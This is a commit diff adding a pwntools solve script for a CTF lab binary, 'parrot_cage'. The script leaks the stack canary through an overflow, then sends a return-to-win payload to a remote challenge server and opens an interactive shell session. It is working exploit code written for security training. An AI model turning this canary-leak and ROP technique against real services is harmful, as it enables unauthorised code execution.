Second CTFs part

2026-05-10 20:42:33 +02:00
parent 5635246581
commit 9f240eba3b
87 changed files with 404506 additions and 0 deletions
--- a/lab1_2_recap/01_parrot_cage/solve.py
+++ b/lab1_2_recap/01_parrot_cage/solve.py
@@ -0,0 +1,54 @@
+#!/usr/bin/env python3
+from pwn import *
+
+elf = context.binary = ELF('./parrot_cage', checksec=False)
+
+OFFSET_TO_CANARY = 72
+#OFFSET_TO_RIP = 88
+
+#p = process(elf.path)
+p = remote('offsec.m0lecon.it',13531)
+print(p.recvline())
+print(p.recvline())
+print(p.recvline())
+print(p.recvline())
+#print(p.recvline())
+#print(p.recvuntil(b'chatting\n'))
+#p.send(b"A"*30+b'\x00'+b"B"*30)
+#For the future: the first byte in the canary is \x00, so I need
+# to overwrite it in order to print the canary
+payload = flat(
+    #b'\x00',
+    b"A" * (OFFSET_TO_CANARY+1),
+    #b'\x00',
+    #p64(canary),
+    #b"B"  * 30,
+    #b"B" * ( OFFTSET_TO_RIP - OFFSET_TO_CANARY - 8),
+    #p64(win_addr),
+)
+p.send(payload)
+p.recvline()
+
+#add the missing 00 byte and convert to int
+canary_raw = b'\x00'+p.recvline()[(OFFSET_TO_CANARY+1):OFFSET_TO_CANARY+1+7].strip()
+print(canary_raw)
+canary = int.from_bytes(canary_raw, byteorder='little')
+print(f"Canary:{p64(canary)}")
+payload = flat(
+    b'A'* OFFSET_TO_CANARY,
+    p64(canary),
+    b'B' * 8, #RBP
+    p64(0x000000000040101a), #gadget
+    p64(0x0000000000401236), #win
+)
+p.send(payload)
+p.sendline(b'bye')
+print(p.recvline())
+#print(p.recvline())
+p.interactive()
+#print(b"Recv "+p.recvline())
+#print(p.recvline())
+
+"""p.send(payload)
+p.sendline(b'bye')
+p.interactive()"""